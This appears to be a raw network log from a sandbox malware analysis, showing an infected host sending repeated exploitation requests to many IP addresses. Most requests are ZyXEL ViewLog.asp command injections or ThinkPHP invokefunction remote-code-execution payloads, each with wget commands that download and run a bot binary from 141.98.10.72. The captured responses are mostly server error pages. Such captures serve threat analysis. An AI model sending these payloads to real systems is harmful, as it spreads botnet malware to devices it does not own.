                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        412192.168.2.145320294.122.48.368080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:46.183851957 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        413192.168.2.144174294.121.30.958080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:46.184102058 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        414192.168.2.144630094.120.26.498080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:46.184264898 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        415192.168.2.145614494.65.101.88080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:46.184331894 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:46.437623024 CET388INHTTP/1.1 404 Not Found
                                                        Date: Mon, 12 Jan 1970 01:50:16 GMT
                                                        Server: DNVRS-Webs
                                                        Cache-Control: no-cache
                                                        Content-Length: 166
                                                        Content-Type: text/html
                                                        Connection: keep-alive
                                                        Keep-Alive: timeout=60, max=99
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        416192.168.2.145431485.156.117.2518080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:46.386475086 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        417192.168.2.1452538112.162.119.7480
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:47.466043949 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:47.738337040 CET516INHTTP/1.0 400 Bad Request
                                                        Content-Type: text/html
                                                        Content-Length: 349
                                                        Connection: close
                                                        Date: Wed, 14 Feb 2024 08:33:46 GMT
                                                        Server: lighttpd/1.4.33
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        418192.168.2.1459270112.213.113.19780
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:47.484719038 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:47.775724888 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:33:47 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        419192.168.2.1437510112.196.16.8980
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:47.544320107 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:47.893635035 CET118INHTTP/1.0 400 Bad Request
                                                        Server: MOH29
                                                        Date: wed, 14 feb 2024 12:42:25 GMT
                                                        Content-Length: 0
                                                        Connection: Close


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        420192.168.2.145914888.221.172.17180
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:47.655184031 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        421192.168.2.144632288.99.199.2080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:47.675441980 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:47.884958029 CET321INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.18.0
                                                        Date: Wed, 14 Feb 2024 08:33:47 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 157
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        422192.168.2.143428088.99.126.15380
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:47.678236961 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:47.889704943 CET115INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close
                                                        Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                        Data Ascii: 400 Bad Request


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        423192.168.2.143313888.157.80.22180
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:47.678694963 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:47.891757965 CET507INHTTP/1.0 400 Bad Request
                                                        Content-Type: text/html
                                                        Content-Length: 349
                                                        Connection: close
                                                        Date: Wed, 14 Feb 2024 08:33:47 GMT
                                                        Server: Server
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        424192.168.2.145708262.29.117.1518080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:48.401545048 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        425192.168.2.145546894.123.43.2408080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:48.401626110 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        426192.168.2.143487031.41.164.508080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:48.639116049 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:48.875423908 CET349INHTTP/1.1 500 Internal Server Error
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 130
                                                        Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <html><head><title>500 Internal Server Error</title></head><body><center><h1>500 Internal Server Error</h1></center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        427192.168.2.144692895.210.84.2880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:50.109708071 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        428192.168.2.144049495.111.239.13880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:50.125591993 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:50.335597992 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:33:50 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        429192.168.2.143587895.217.107.15280
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:50.133842945 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:50.352247953 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:33:50 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        430192.168.2.143530495.160.19.21080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:50.149267912 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:50.383671999 CET524INHTTP/1.0 400 Bad Request
                                                        Content-Type: text/html
                                                        Content-Length: 349
                                                        Connection: close
                                                        Date: Wed, 14 Feb 2024 09:02:30 GMT
                                                        Server: lighttpd/1.4.11 (Win32)
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        431192.168.2.144133288.99.188.4580
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:50.327191114 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:50.528878927 CET337INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.13.7
                                                        Date: Wed, 14 Feb 2024 08:33:50 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 173
                                                        Connection: close
